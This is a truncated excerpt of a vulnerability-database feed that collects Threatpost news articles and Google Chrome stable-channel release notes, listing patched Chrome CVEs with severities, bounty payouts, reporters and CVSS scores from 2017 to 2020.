Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and opened up a possible attack based on \u201cheap buffer overflow in UI on Android\u201d conditions. Credited for discovering the bug on Oct. 31 is Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.\n\n## **\u2018Actively Exploited in the Wild\u2019**\n\nGoogle said it was withholding the technical details of both bugs, pending the distribution of patches to effected endpoints. While Google said publicly known exploits existed for both bugs, it did not indicate that either one was under active attack. Google\u2019s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.\n\n\u201cToday Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,\u201d he wrote.\n\n> Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android. <https://t.co/IOhFwT0Wx1>\n> \n> \u2014 Ben Hawkes (@benhawkes) [November 2, 2020](<https://twitter.com/benhawkes/status/1323374326150701057?ref_src=twsrc%5Etfw>)\n\nAs a precaution, Google said in its security update that it would \u201calso retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d according to the post.\n\n## **The Other Android Bugs**\n\nThe new Chrome Android release also includes stability and performance improvements, according to the Google Chrome team.\n\nVulnerabilities patched in the Chrome desktop update included a \u201cuse after free\u201d bug (CVE-2020-16004); an \u201cinsufficient policy enforcement in ANGLE\u201d flaw (CVE-2020-16005); an \u201cinsufficient data validation in installer\u201d issue (CVE-2020-16007) and a \u201cstack buffer overflow in WebRTC\u201d bug (CVE-2020-16008). Lastly there Google reported a \u201cheap buffer overflow in UI on Windows\u201d tracked as (CVE-2020-16011).\n\nThis week\u2019s Chrome updates come on the heels of zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google effecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome\u2019s FreeType font rendering library.\n\nThe latest vulnerabilities mean that in that just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser. In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-03T17:23:23", "type": "threatpost", "title": "Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-14750", "CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16011", "CVE-2020-6418"], "modified": "2020-11-03T17:23:23", "id": "THREATPOST:DF87733B74489628AB9F2C89704380A9", "href": "https://threatpost.com/chrome-holes-actively-targeted/160890/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:36", "description": "Google on Monday released the [latest stable version of Chrome](<https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html>) that includes patches for 30 vulnerabilities, including five high severity issues.\n\nThe company paid out $23,500 to external researchers for the vulnerabilities, including $7,500 for a type confusion vulnerability in V8, the open source JavaScript engine Google uses for the browser. The fix was a relatively quick one for Google; Zhao Qixun, a researcher with Qihoo 360\u2019s Vulcan Team, discovered the vulnerability just three weeks ago.\n\nThe update also helps resolve a high severity out-of-bounds read vulnerability in V8, two high severity use-after-free vulnerabilities\u2013one in the browser\u2019s print preview feature, another in its Bluetooth app functionality\u2013and a vulnerability that could have enabled address spoofing in the browser\u2019s Omnibox address bar.\n\nAddress spoofing vulnerabilities continue to be a problem for Chrome. Google has fixed roughly a dozen of them in the browser since last September, including three in Monday\u2019s Chrome 59 update, three in April\u2019s Chrome 58 update \u2013 including one that could\u2019ve led to [unicode phishing attacks](<https://threatpost.com/google-fixes-unicode-phishing-vulnerability-in-chrome-58-firefox-standing-pat/125099/>), two in Chrome 57 [in March](<https://threatpost.com/google-chrome-57-browser-update-patches-high-severity-flaws/124235/>), and two in Chrome 56 [in January](<https://threatpost.com/high-severity-chrome-vulnerabilities-earn-researcher-32k-in-rewards/123363/>). Attackers traditionally used the vulnerabilities to trick users into visiting unintended sites, often ones hosting malware.\n\nThe high, medium, and low-severity bugs in Chrome that earned bounties are:\n\n * [$7500] [[722756](<https://crbug.com/722756>)]** High **CVE-2017-5070: Type confusion in V8. _Reported by Zhao Qixun(@S0rryMybad) of Qihoo 360 Vulcan Team on 2017-05-16_\n * [$3000] [[715582](<https://crbug.com/715582>)]** High **CVE-2017-5071: Out of bounds read in V8. _Reported by Choongwoo Han on 2017-04-26_\n * [$3000] [[709417](<https://crbug.com/709417>)]** High **CVE-2017-5072: Address spoofing in Omnibox. _Reported by Rayyan Bijoora on 2017-04-07_\n * [$2000] [[716474](<https://crbug.com/716474>)]** High **CVE-2017-5073: Use after free in print preview. _Reported by Khalil Zhani on 2017-04-28_\n * [$1000] [[700040](<https://crbug.com/700040>)]** High **CVE-2017-5074: Use after free in Apps Bluetooth. _Reported by anonymous on 2017-03-09_\n * [$2000] [[678776](<https://crbug.com/678776>)]** Medium **CVE-2017-5075: Information leak in CSP reporting. _Reported by Emmanuel Gil Peyrot on 2017-01-05_\n * [$1000] [[722639](<https://crbug.com/722639>)]** Medium **CVE-2017-5086: Address spoofing in Omnibox. _Reported by Rayyan Bijoora on 2017-05-16_\n * [$1000] [[719199](<https://crbug.com/719199>)]** Medium **CVE-2017-5076: Address spoofing in Omnibox. _Reported by Samuel Erb on 2017-05-06_\n * [$1000] [[716311](<https://crbug.com/716311>)]** Medium **CVE-2017-5077: Heap buffer overflow in Skia. _Reported by Sweetchip on 2017-04-28_\n * [$1000] [[711020](<https://crbug.com/711020>)]** Medium **CVE-2017-5078: Possible command injection in mailto handling. _Reported by Jose Carlos Exposito Bueno on 2017-04-12_\n * [$500] [[713686](<https://crbug.com/713686>)]** Medium **CVE-2017-5079: UI spoofing in Blink. _Reported by Khalil Zhani on 2017-04-20_\n * [$500] [[708819](<https://crbug.com/708819>)]** Medium **CVE-2017-5080: Use after free in credit card autofill. _Reported by Khalil Zhani on 2017-04-05_\n * [$N/A] [[672008](<https://crbug.com/672008>)]** Medium **CVE-2017-5081: Extension verification bypass. _Reported by Andrey Kovalev (@L1kvID) Yandex Security Team on 2016-12-07_\n * [$N/A] [[721579](<https://crbug.com/721579>)]** Low **CVE-2017-5082: Insufficient hardening in credit card editor. _Reported by Nightwatch Cybersecurity Research on 2017-05-11_\n * [$N/A] [[714849](<https://crbug.com/714849>)]** Low **CVE-2017-5083: UI spoofing in Blink. _Reported by Khalil Zhani on 2017-04-24_\n * [$N/A] [[692378](<https://crbug.com/692378>)]** Low **CVE-2017-5085: Inappropriate javascript execution on WebUI pages. _Reported by Zhiyang Zeng of Tencent security platform department on 2017-02-15_\n\nThe update also resolves a low severity issue in Blink, the rendering engine used by Chrome, that was more than two years in the making.\n\nDaniel Veditz, a member of Mozila\u2019s Security Team, pointed out in May 2015 that sendBeacon(), a method used to transmit data to a provided URL, allowed for the sending of POST requests with arbitrary content type.\n\n> [@sirdarckcat](<https://twitter.com/sirdarckcat>) XHR can also send any/content-type data. Like XHR, sendBeacon uses the CORS model.\n> \n> \u2014 Daniel Veditz (@dveditz) [May 20, 2015](<https://twitter.com/dveditz/status/600920852524244993>)\n\nIt took developers two years but a [patch for the issue](<https://bugs.chromium.org/p/chromium/issues/detail?id=490015>) was finally merged into Chrome 59 on Monday, as well as into Chrome 60, expected to be released sometime in mid- July.\n\nThe update comes with a collection of non-security tweaks as well, including the ability to push native macOS notifications, and a new Chrome Settings page.\n\nAbsent from the update is a fix for a hack that could have let attackers automatically download a malicious file to a victim\u2019s PC to steal credentials and launch SMB relay attacks. The vulnerability, [described in detail last month](<https://threatpost.com/chrome-browser-hack-opens-door-to-credential-theft/125686/>), is tied to the way both Chrome and Windows handles .SCF files. Google told Threatpost at the time it was aware of the issue and \u201ctaking the necessary actions.\u201d\n\nThe update comes a few days after Google reportedly told some of its publishers it plans to debut a new ad-blocking tool in the browser in 2018. The feature, which will be turned on by default according to the [_Wall Street Journal_,](<https://www.wsj.com/articles/google-will-help-publishers-prepare-for-a-chrome-ad-blocker-coming-next-year-1496344237>) will block ads from appearing on websites \u201cthat are deemed to provide a bad advertising experience for users.\u201d The company gave publishers, agencies and advertisers a six-month heads up about its plans last week to help them better prepare.\n", "cvss3": {}, "published": "2017-06-06T13:36:40", "type": "threatpost", "title": "Google Fixes 30 Vulnerabilities, Five High Severity, in Chrome 59", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2017-06-06T17:36:40", "id": "THREATPOST:0CFA20DA4CAE2D0F32CD16D0779CC426", "href": "https://threatpost.com/google-fixes-30-vulnerabilities-five-high-severity-in-chrome-59/126091/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "chrome": [{"lastseen": "2021-12-30T22:31:46", "description": "The stable channel has been updated to 80.0.3987.122 for Windows, Mac, and Linux, which will roll out over the coming days/weeks. \n\n\n\n\n\n\nA list of all changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/80.0.3987.116..80.0.3987.122?pretty=fuller&n=10000>). Interested in switching release channels? [ Find out how](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. \n\n\n\n\n**Security Fixes and Rewards** \n\n\n\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n** \n** \n\n\nThis update includes [3](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-3-M80>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n** \n** \n\n\n[$5000][[1044570](<https://crbug.com/1044570>)] High: Integer overflow in ICU. Reported by Andr\u00e9 Bargull (with thanks to Jeff Walden from Mozilla) on 2020-01-22\n\n[N/A][[1045931](<https://crbug.com/1045931>)] High CVE-2020-6407: Out of bounds memory access in streams. Reported by Sergei Glazunov of Google Project Zero on 2020-01-27\n\n** \n** \n\n\nThis release also contains:\n\n[N/A][[1053604](<https://crbug.com/1053604>)] High CVE-2020-6418: Type confusion in V8. Reported by Clement Lecigne of Google's Threat Analysis Group on 2020-02-18\n\n** \n** \n\n\nGoogle is aware of reports that an exploit for CVE-2020-6418 exists in the wild.\n\n** \n** \n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\n\n\n\n\n\n\n\n\n\nKrishna Govind \nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-24T00:00:00", "id": "GCSA-2415374810976728715", "href": "https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T05:32:51", "description": "The Chrome team is delighted to announce the promotion of Chrome 59 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks.\n\n\n\n\nChrome 59.0.3071.86 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/58.0.3029.110..59.0.3071.86?pretty=fuller&n=10000>). Watch out for upcoming[ Chrome](<http://chrome.blogspot.com/>) and[ Chromium](<http://blog.chromium.org/>) blog posts about new features and big efforts delivered in 59.\n\n\n\n\nChrome Settings has updated to [Material Design](<http://material.io/>) with a slick new look with the same ease of use and functionality. Check it out!\n\n\n\n\n## Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [30](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-0-M59>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$7500][[722756](<https://crbug.com/722756>)] High CVE-2017-5070: Type confusion in V8. Reported by Zhao Qixun(@S0rryMybad) of Qihoo 360 Vulcan Team on 2017-05-16\n\n[$3000][[715582](<https://crbug.com/715582>)] High CVE-2017-5071: Out of bounds read in V8. Reported by Choongwoo Han on 2017-04-26\n\n[$3000][[709417](<https://crbug.com/709417>)] High CVE-2017-5072: Address spoofing in Omnibox. Reported by Rayyan Bijoora on 2017-04-07\n\n[$2000][[716474](<https://crbug.com/716474>)] High CVE-2017-5073: Use after free in print preview. Reported by Khalil Zhani on 2017-04-28\n\n[$1000][[700040](<https://crbug.com/700040>)] High CVE-2017-5074: Use after free in Apps Bluetooth. Reported by anonymous on 2017-03-09\n\n[$2000][[678776](<https://crbug.com/678776>)] Medium CVE-2017-5075: Information leak in CSP reporting. Reported by Emmanuel Gil Peyrot on 2017-01-05\n\n[$1000][[722639](<https://crbug.com/722639>)] Medium CVE-2017-5086: Address spoofing in Omnibox. Reported by Rayyan Bijoora on 2017-05-16\n\n[$1000][[719199](<https://crbug.com/719199>)] Medium CVE-2017-5076: Address spoofing in Omnibox. Reported by Samuel Erb on 2017-05-06\n\n[$1000][[716311](<https://crbug.com/716311>)] Medium CVE-2017-5077: Heap buffer overflow in Skia. Reported by Sweetchip on 2017-04-28\n\n[$1000][[711020](<https://crbug.com/711020>)] Medium CVE-2017-5078: Possible command injection in mailto handling. Reported by Jose Carlos Exposito Bueno on 2017-04-12\n\n[$500][[713686](<https://crbug.com/713686>)] Medium CVE-2017-5079: UI spoofing in Blink. Reported by Khalil Zhani on 2017-04-20\n\n[$500][[708819](<https://crbug.com/708819>)] Medium CVE-2017-5080: Use after free in credit card autofill. Reported by Khalil Zhani on 2017-04-05\n\n[$N/A][[672008](<https://crbug.com/672008>)] Medium CVE-2017-5081: Extension verification bypass. Reported by Andrey Kovalev (@L1kvID) Yandex Security Team on 2016-12-07\n\n[$N/A][[721579](<https://crbug.com/721579>)] Low CVE-2017-5082: Insufficient hardening in credit card editor. Reported by Nightwatch Cybersecurity Research on 2017-05-11\n\n[$N/A][[714849](<https://crbug.com/714849>)] Low CVE-2017-5083: UI spoofing in Blink. Reported by Khalil Zhani on 2017-04-24\n\n[$N/A][[692378](<https://crbug.com/692378>)] Low CVE-2017-5085: Inappropriate javascript execution on WebUI pages. Reported by Zhiyang Zeng of Tencent security platform department on 2017-02-15\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n\n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[729639](<https://crbug.com/729639>)] Various fixes from internal audits, fuzzing and other initiatives\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), or [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>).\n\n\n\n\n\n\n\nInterested in switching release channels?[ Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by[ filing a bug](<http://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\n\n\n\nAbdul Syed\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-05T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2017-06-05T00:00:00", "id": "GCSA-3820662912991436133", "href": "https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-29T20:06:42", "description": "The Chrome team is delighted to announce the promotion of Chrome 72 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks. \n\nChrome 72.0.3626.81 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/71.0.3578.98..72.0.3626.81?pretty=fuller&n=10000>). Watch out for upcoming[ Chrome](<https://chrome.blogspot.com/>) and[ Chromium](<https://blog.chromium.org/>) blog posts about new features and big efforts delivered in 72. \n\n\n\n\n\n\n\n\n\n**Security Fixes and Rewards** \nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\nThis update includes [58](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-0-M72>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n[$7500][[914497](<https://crbug.com/914497>)] Critical CVE-2019-5754: Inappropriate implementation in QUIC Networking. Reported by Klzgrad on 2018-12-12 \n[$N/A][[906043](<https://crbug.com/906043>)] High CVE-2019-5782: Inappropriate implementation in V8. Reported by Qixun Zhao of Qihoo 360 Vulcan Team via Tianfu Cup on 2018-11-16 \n[$5000][[913296](<https://crbug.com/913296>)] High CVE-2019-5755: Inappropriate implementation in V8. Reported by Jay Bosamiya on 2018-12-10 \n[$5000][[895152](<https://crbug.com/895152>)] High CVE-2019-5756: Use after free in PDFium. Reported by Anonymous on 2018-10-14 \n[$3000][[915469](<https://crbug.com/915469>)] High CVE-2019-5757: Type Confusion in SVG. Reported by Alexandru Pitis, Microsoft Browser Vulnerability Research on 2018-12-15 \n[$3000][[913970](<https://crbug.com/913970>)] High CVE-2019-5758: Use after free in Blink. Reported by Zhe Jin\uff08\u91d1\u54f2\uff09\uff0cLuyao Liu(\u5218\u8def\u9065) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd on 2018-12-11 \n[$3000][[912211](<https://crbug.com/912211>)] High CVE-2019-5759: Use after free in HTML select elements. Reported by Almog Benin on 2018-12-05 \n[$3000][[912074](<https://crbug.com/912074>)] High CVE-2019-5760: Use after free in WebRTC. Reported by Zhe Jin\uff08\u91d1\u54f2\uff09\uff0cLuyao Liu(\u5218\u8def\u9065) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd on 2018-12-05 \n[$3000][[904714](<https://crbug.com/904714>)] High CVE-2019-5761: Use after free in SwiftShader. Reported by Zhe Jin\uff08\u91d1\u54f2\uff09\uff0cLuyao Liu(\u5218\u8def\u9065) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd on 2018-11-13 \n[$3000][[900552](<https://crbug.com/900552>)] High CVE-2019-5762: Use after free in PDFium. Reported by Anonymous on 2018-10-31 \n[$1000][[914731](<https://crbug.com/914731>)] High CVE-2019-5763: Insufficient validation of untrusted input in V8. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-12-13 \n[$1000][[913246](<https://crbug.com/913246>)] High CVE-2019-5764: Use after free in WebRTC. Reported by Eyal Itkin from Check Point Software Technologies on 2018-12-09 \n[$N/A][[922677](<https://crbug.com/922677>)] High CVE-2019-13768: Use after free in FileAPI. Reported by Mark Brand of Google Project Zero on 2019-01-16\n\n[$TBD][[922627](<https://crbug.com/922627>)] High CVE-2019-5765: Insufficient policy enforcement in the browser. Reported by Sergey Toshin (@bagipro) on 2019-01-16 \n[$N/A][[916080](<https://crbug.com/916080>)] High: Use after free in Mojo interface. Reported by Mark Brand of Google Project Zero on 2018-12-18 \n[$N/A][[912947](<https://crbug.com/912947>)] High: Use after free in Payments. Reported by Mark Brand of Google Project Zero on 2018-12-07 \n[$N/A][[912520](<https://crbug.com/912520>)] High: Use after free in Mojo interface. Reported by Mark Brand of Google Project Zero on 2018-12-06 \n[$N/A][[899689](<https://crbug.com/899689>)] High CVE-2019-5785: Stack buffer overflow in Skia. Reported by Ivan Fratric of Google Project Zero on 2018-10-29 \n[$4000][[907047](<https://crbug.com/907047>)] Medium CVE-2019-5766: Insufficient policy enforcement in Canvas. Reported by David Erceg on 2018-11-20 \n[$2000][[902427](<https://crbug.com/902427>)] Medium CVE-2019-5767: Incorrect security UI in WebAPKs. Reported by Haoran Lu, Yifan Zhang, Luyi Xing, and Xiaojing Liao from Indiana University Bloomington on 2018-11-06 \n[$2000][[805557](<https://crbug.com/805557>)] Medium CVE-2019-5768: Insufficient policy enforcement in DevTools. Reported by Rob Wu on 2018-01-24 \n[$1000][[913975](<https://crbug.com/913975>)] Medium CVE-2019-5769: Insufficient validation of untrusted input in Blink. Reported by Guy Eshel on 2018-12-11 \n[$1000][[908749](<https://crbug.com/908749>)] Medium CVE-2019-5770: Heap buffer overflow in WebGL. Reported by hemidallt@ on 2018-11-27 \n[$1000][[904265](<https://crbug.c

In-the-Wild Series: Chrome Exploits

Description

Related